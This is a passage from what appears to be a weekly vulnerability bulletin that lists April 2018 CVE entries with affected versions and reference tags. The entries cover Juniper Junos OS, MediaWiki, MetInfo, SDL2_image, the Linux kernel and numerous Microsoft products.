On SRX Series devices during compilation of IDP policies, an attacker sending specially crafted packets may be able to bypass firewall rules, leading to information disclosure which an attacker may use to gain control of the target device or other internal devices, systems or services protected by the SRX Series device. This issue only applies to devices where IDP policies are applied to one or more rules. Customers not using IDP policies are not affected. Depending on if the IDP updates are automatic or not, as well as the interval between available updates, an attacker may have more or less success in performing reconnaissance or bypass attacks on the victim SRX Series device or protected devices. ScreenOS with IDP is not vulnerable to this issue. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D60 on SRX; 12.3X48 versions prior to 12.3X48-D35 on SRX; 15.1X49 versions prior to 15.1X49-D60 on SRX. 2018-04-11 not yet calculated CVE-2018-0018
BID
CONFIRMjuniper_networks -- junos_os
Junos OS may be impacted by the receipt of a malformed BGP UPDATE which can lead to a routing process daemon (rpd) crash and restart. Receipt of a repeated malformed BGP UPDATEs can result in an extended denial of service condition for the device. This malformed BGP UPDATE does not propagate to other BGP peers. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D47; 15.1 versions prior to 15.1F6-S10, 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D130 on SRX; 15.1X53 versions prior to 15.1X53-D66 on QFX10K; 15.1X53 versions prior to 15.1X53-D58 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471 on NFX; 16.1 versions prior to 16.1R3-S8, 16.1R4-S9, 16.1R5-S3, 16.1R6-S3, 16.1R7; 16.1X65 versions prior to 16.1X65-D47; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R2-S3, 17.1R3; 17.2 versions prior to 17.2R1-S3, 17.2R2-S1, 17.2R3; 17.2X75 versions prior to 17.2X75-D70; 13.2 versions above and including 13.2R1. Versions prior to 13.2R1 are not affected. Juniper SIRT is not aware of any malicious exploitation of this vulnerability. No other Juniper Networks products or platforms are affected by this issue. 2018-04-11 not yet calculated CVE-2018-0020
CONFIRMjuniper_networks -- junos_os
If all 64 digits of the connectivity association name (CKN) key or all 32 digits of the connectivity association key (CAK) key are not configured, all remaining digits will be auto-configured to 0. Hence, Juniper devices configured with short MacSec keys are at risk to an increased likelihood that an attacker will discover the secret passphrases configured for these keys through dictionary-based and brute-force-based attacks using spoofed packets. Affected releases are Juniper Networks Junos OS: 14.1 versions prior to 14.1R10, 14.1R9; 14.1X53 versions prior to 14.1X53-D47; 15.1 versions prior to 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D100; 15.1X53 versions prior to 15.1X53-D59; 16.1 versions prior to 16.1R3-S8, 16.1R4-S8, 16.1R5; 16.2 versions prior to 16.2R1-S6, 16.2R2; 17.1 versions prior to 17.1R2. 2018-04-11 not yet calculated CVE-2018-0021
CONFIRMjuniper_networks -- junos_os
A Junos device with VPLS routing-instances configured on one or more interfaces may be susceptible to an mbuf leak when processing a specific MPLS packet. Approximately 1 mbuf is leaked per each packet processed. The number of mbufs is platform dependent. The following command provides the number of mbufs that are currently in use and maximum number of mbufs that can be allocated on a platform: > show system buffers 2437/3143/5580 mbufs in use (current/cache/total) Once the device runs out of mbufs it will become inaccessible and a restart will be required. This issue only affects end devices, transit devices are not affected. Affected releases are Juniper Networks Junos OS with VPLS configured running: 12.1X46 versions prior to 12.1X46-D76; 12.3X48 versions prior to 12.3X48-D66, 12.3X48-D70; 14.1 versions prior to 14.1R9; 14.1X53 versions prior to 14.1X53-D47; 14.2 versions prior to 14.2R8; 15.1 versions prior to 15.1F2-S19, 15.1F6-S10, 15.1R4-S9, 15.1R5-S7, 15.1R6-S4, 15.1R7; 15.1X49 versions prior to 15.1X49-D131, 15.1X49-D140; 15.1X53 versions prior to 15.1X53-D58 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471 on NFX; 15.1X53 versions prior to 15.1X53-D66 on QFX10; 16.1 versions prior to 16.1R3-S8, 16.1R4-S6, 16.1R5; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S6, 17.1R3; 17.2 versions prior to 17.2R1-S5, 17.2R2. 2018-04-11 not yet calculated CVE-2018-0022
BID
CONFIRMjuniper_networks -- junos_snapshot_administrator
JSNAPy is an open source python version of Junos Snapshot Administrator developed by Juniper available through github. The default configuration and sample files of JSNAPy automation tool versions prior to 1.3.0 are created world writable. This insecure file and directory permission allows unprivileged local users to alter the files under this directory including inserting operations not intended by the package maintainer, system administrator, or other users. This issue only affects users who downloaded and installed JSNAPy from github. 2018-04-11 not yet calculated CVE-2018-0023
BID
CONFIRMkaazing -- gateway_and_gateway_jms_edition
The HTTP and WebSocket engine components in the server in Kaazing Gateway before 4.5.3 hotfix-1, Gateway - JMS Edition before 4.0.5 hotfix-15, 4.0.6 before hotfix-4, 4.0.7, 4.0.9 before hotfix-19, 4.4.x before 4.4.2 hotfix-1, 4.5.x before 4.5.3 hotfix-1, and Gateway Community and Enterprise Editions before 5.6.0 allow remote attackers to bypass intended access restrictions and obtain sensitive information via vectors related to HTTP request handling. 2018-04-12 not yet calculated CVE-2017-6910
CONFIRMkaazing -- gateway_and_gateway_jms_edition
The HTTP and WebSocket engine components in the server in Kaazing Gateway 4.0.2, 4.0.3, and 4.0.4 and Gateway - JMS Edition 4.0.2, 4.0.3, and 4.0.4 allow remote attackers to obtain sensitive information via vectors related to HTTP request handling. 2018-04-12 not yet calculated CVE-2014-6309
CONFIRMkotti -- kotti
Kotti before 1.3.2 and 2.x before 2.0.0b2 has CSRF in the local roles implementation, as demonstrated by triggering a permission change via a /admin-document/@@share request. 2018-04-09 not yet calculated CVE-2018-9856
MISClaquis -- scada_software
A structured exception handler overflow vulnerability in Leao Consultoria e Desenvolvimento de Sistemas (LCDS) LTDA ME LAquis SCADA 4.1.0.3391 and earlier may allow code execution. 2018-04-09 not yet calculated CVE-2018-5463
BID
MISClibsdl -- simple_directmedia_layer_sdl2_image
An exploitable code execution vulnerability exists in the XCF image rendering functionality of Simple DirectMedia Layer SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. 2018-04-10 not yet calculated CVE-2018-3839
MISClibsdl -- simple_directmedia_layer_sdl2_image
An exploitable information vulnerability exists in the XCF image rendering functionality of Simple DirectMedia Layer SDL2_image-2.0.2. A specially crafted XCF image can cause an out-of-bounds read on the heap, resulting in information disclosure. An attacker can display a specially crafted image to trigger this vulnerability. 2018-04-10 not yet calculated CVE-2018-3838
MISClibsdl -- simple_directmedia_layer_sdl2_image
An exploitable information disclosure vulnerability exists in the PCX image rendering functionality of Simple DirectMedia Layer SDL2_image-2.0.2. A specially crafted PCX image can cause an out-of-bounds read on the heap, resulting in information disclosure . An attacker can display a specially crafted image to trigger this vulnerability. 2018-04-10 not yet calculated CVE-2018-3837
MISClibxml2 -- libxml2
The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file. 2018-04-08 not yet calculated CVE-2017-18258
MISClinux -- linux_kernel
drivers/scsi/libsas/sas_scsi_host.c in the Linux kernel before 4.16 allows local users to cause a denial of service (ata qc leak) by triggering certain failure conditions. 2018-04-11 not yet calculated CVE-2018-10021
MISC
MISClinux -- linux_kernel
The kernel_wait4 function in kernel/exit.c in the Linux kernel before 4.13, when an unspecified architecture and compiler is used, might allow local users to cause a denial of service by triggering an attempted use of the -INT_MIN value. 2018-04-13 not yet calculated CVE-2018-10087
MISC
MISC
MISClinux -- linux_kernel
The hi3660_stub_clk_probe function in drivers/clk/hisilicon/clk-hi3660-stub.c in the Linux kernel before 4.16 allows local users to cause a denial of service (NULL pointer dereference) by triggering a failure of resource retrieval. 2018-04-12 not yet calculated CVE-2018-10074
MISC
MISClxr_project -- lxr
LXR version 1.0.0 to 2.3.0 allows remote attackers to execute arbitrary OS commands via unspecified vectors. 2018-04-09 not yet calculated CVE-2018-0545
JVN
CONFIRMmahara -- mahara
Mahara 16.10 before 16.10.9 and 17.04 before 17.04.7 and 17.10 before 17.10.4 are vulnerable to bad input when TinyMCE is bypassed by POST packages. Therefore, Mahara should not rely on TinyMCE's code stripping alone but also clean input on the server / PHP side as one can create own packets of POST data containing bad content with which to hit the server. 2018-04-09 not yet calculated CVE-2018-6182
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a XSS vulnerability in SearchHighlighter::highlightText() with non-default configurations. 2018-04-13 not yet calculated CVE-2017-0365
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 has a flaw where Special:UserLogin?returnto=interwiki:foo will redirect to external sites. 2018-04-13 not yet calculated CVE-2017-0363
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw where the "Mark all pages visited" on the watchlist does not require a CSRF token. 2018-04-13 not yet calculated CVE-2017-0362
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw making rawHTML mode apply to system messages. 2018-04-13 not yet calculated CVE-2017-0368
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw where Special:Search allows redirects to any interwiki link. 2018-04-13 not yet calculated CVE-2017-0364
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains an information disclosure flaw, where the api.log might contain passwords in plaintext. 2018-04-13 not yet calculated CVE-2017-0361
SECTRACK
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw, allowing a sysops to undelete pages, although the page is protected against it. 2018-04-13 not yet calculated CVE-2017-0369
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 contains an unsafe use of temporary directory, where having LocalisationCache directory default to system tmp directory is insecure. 2018-04-13 not yet calculated CVE-2017-0367
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw were Spam blacklist is ineffective on encoded URLs inside file inclusion syntax's link parameter. 2018-04-13 not yet calculated CVE-2017-0370
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Parameters injection in the SyntaxHighlight extension of Mediawiki before 1.23.16, 1.27.3 and 1.28.2 might result in multiple vulnerabilities. 2018-04-13 not yet calculated CVE-2017-0372
MISC
MLIST
MLIST
CONFIRM
CONFIRMmediawiki -- mediawiki
Mediawiki before 1.28.1 / 1.27.2 / 1.23.16 contains a flaw allowing to evade SVG filter using default attribute values in DTD declaration. 2018-04-13 not yet calculated CVE-2017-0366
MLIST
CONFIRM
CONFIRMmetinfo -- metinfo
The reset-password feature in MetInfo 6.0 allows remote attackers to change arbitrary passwords via vectors involving a Host HTTP header that is modified to specify a web server under the attacker's control. 2018-04-10 not yet calculated CVE-2018-9934
MISC
MISCmetinfo -- metinfo
Cross-site scripting (XSS) vulnerability in save.php in MetInfo 6.0 allows remote attackers to inject arbitrary web script or HTML via the webname or weburl parameter. 2018-04-10 not yet calculated CVE-2018-9928
MISCmetinfo -- metinfo
The front page of MetInfo 6.0 allows XSS by sending a feedback message to an administrator. 2018-04-10 not yet calculated CVE-2018-9985
MISCmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory, aka "Microsoft Browser Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. 2018-04-11 not yet calculated CVE-2018-1023
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0979
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0993
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0980
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995. 2018-04-11 not yet calculated CVE-2018-1019
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0995
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0995, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0994
BID
SECTRACK
CONFIRMmicrosoft -- edge_and_chakracore
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019. 2018-04-11 not yet calculated CVE-2018-0990
BID
SECTRACK
CONFIRMmicrosoft -- edge
An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-0998. 2018-04-11 not yet calculated CVE-2018-0892
BID
SECTRACK
CONFIRMmicrosoft -- edge
An information disclosure vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-0892. 2018-04-11 not yet calculated CVE-2018-0998
BID
SECTRACK
CONFIRMmicrosoft -- excel_and_office A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Excel, Microsoft Office. This CVE ID is unique from CVE-2018-0920, CVE-2018-1011, CVE-2018-1029. 2018-04-11 not yet calculated CVE-2018-1027
BID
SECTRACK
CONFIRMmicrosoft -- excel_viewer_and_office_and_excel
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Excel Viewer, Microsoft Office, Microsoft Excel. This CVE ID is unique from CVE-2018-0920, CVE-2018-1011, CVE-2018-1027. 2018-04-11 not yet calculated CVE-2018-1029
BID
SECTRACK
CONFIRMmicrosoft -- excel
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Excel. This CVE ID is unique from CVE-2018-1011, CVE-2018-1027, CVE-2018-1029. 2018-04-11 not yet calculated CVE-2018-0920
BID
SECTRACK
CONFIRMmicrosoft -- excel
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Excel. This CVE ID is unique from CVE-2018-0920, CVE-2018-1027, CVE-2018-1029. 2018-04-11 not yet calculated CVE-2018-1011
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
An information disclosure vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Information Disclosure Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0981, CVE-2018-0987, CVE-2018-1000. 2018-04-11 not yet calculated CVE-2018-0989
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0870, CVE-2018-0991, CVE-2018-0997, CVE-2018-1018. 2018-04-11 not yet calculated CVE-2018-1020
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
An information disclosure vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Information Disclosure Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0987, CVE-2018-0989, CVE-2018-1000. 2018-04-11 not yet calculated CVE-2018-0981
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0996, CVE-2018-1001. 2018-04-11 not yet calculated CVE-2018-0988
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11. This CVE ID is unique from CVE-2018-0870, CVE-2018-0991, CVE-2018-1018, CVE-2018-1020. 2018-04-11 not yet calculated CVE-2018-0997
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0988, CVE-2018-1001. 2018-04-11 not yet calculated CVE-2018-0996
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0870, CVE-2018-0997, CVE-2018-1018, CVE-2018-1020. 2018-04-11 not yet calculated CVE-2018-0991
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11. This CVE ID is unique from CVE-2018-0870, CVE-2018-0991, CVE-2018-0997, CVE-2018-1020. 2018-04-11 not yet calculated CVE-2018-1018
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0988, CVE-2018-0996. 2018-04-11 not yet calculated CVE-2018-1001
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Internet Explorer, aka "Scripting Engine Information Disclosure Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0981, CVE-2018-0989, CVE-2018-1000. 2018-04-11 not yet calculated CVE-2018-0987
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
An information disclosure vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Information Disclosure Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-0981, CVE-2018-0987, CVE-2018-0989. 2018-04-11 not yet calculated CVE-2018-1000
BID
SECTRACK
CONFIRMmicrosoft -- internet_explorer
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11. This CVE ID is unique from CVE-2018-0991, CVE-2018-0997, CVE-2018-1018, CVE-2018-1020. 2018-04-11 not yet calculated CVE-2018-0870
BID
SECTRACK
CONFIRMmicrosoft -- multiple_products
A remote code execution vulnerability exists when the Office graphics component improperly handles specially crafted embedded fonts, aka "Microsoft Office Graphics Remote Code Execution Vulnerability." This affects Word, Microsoft Office, Microsoft SharePoint, Excel, Microsoft SharePoint Server. 2018-04-11 not yet calculated CVE-2018-1028
BID
SECTRACK
CONFIRMmicrosoft -- office
A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-1026. 2018-04-11 not yet calculated CVE-2018-1030
BID
SECTRACK
CONFIRMmicrosoft -- office
An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory, aka "Microsoft Office Information Disclosure Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-0950. 2018-04-11 not yet calculated CVE-2018-1007
BID
SECTRACK
CONFIRMmicrosoft -- office
A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-1030. 2018-04-11 not yet calculated CVE-2018-1026
BID
SECTRACK
CONFIRMmicrosoft -- sharepoint
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint. This CVE ID is unique from CVE-2018-1005, CVE-2018-1032, CVE-2018-1034. 2018-04-11 not yet calculated CVE-2018-1014
BID
SECTRACK
CONFIRMmicrosoft -- sharepoint
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint Server, Microsoft SharePoint. This CVE ID is unique from CVE-2018-1005, CVE-2018-1014, CVE-2018-1034. 2018-04-11 not yet calculated CVE-2018-1032
BID
SECTRACK
CONFIRMmicrosoft -- sharepoint
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint. This CVE ID is unique from CVE-2018-1014, CVE-2018-1032, CVE-2018-1034. 2018-04-11 not yet calculated CVE-2018-1005
BID
SECTRACK
CONFIRMmicrosoft -- sharepoint
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint. This CVE ID is unique from CVE-2018-1005, CVE-2018-1014, CVE-2018-1032. 2018-04-11 not yet calculated CVE-2018-1034
BID
SECTRACK
CONFIRMmicrosoft -- visual_studio
An information disclosure vulnerability exists when Visual Studio improperly discloses limited contents of uninitialized memory while compiling program database (PDB) files, aka "Microsoft Visual Studio Information Disclosure Vulnerability." This affects Microsoft Visual Studio. 2018-04-11 not yet calculated CVE-2018-1037
BID
SECTRACK
CONFIRMmicrosoft -- windows_and_internet_explorer
A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Internet Explorer 9, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10. 2018-04-11 not yet calculated CVE-2018-1004
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows Server 2012 R2, Windows RT 8.1, Windows Server 2016, Windows 8.1, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0968
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0970
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0960
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. 2018-04-11 not yet calculated CVE-2018-0963
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0887
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0969
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0971, CVE-2018-0972, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0973
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-0887, CVE-2018-0960, CVE-2018-0968, CVE-2018-0969, CVE-2018-0970, CVE-2018-0972, CVE-2018-0973, CVE-2018-0974, CVE-2018-0975. 2018-04-11 not yet calculated CVE-2018-0971
BID
SECTRACK
CONFIRMmicrosoft -- windows_kernel
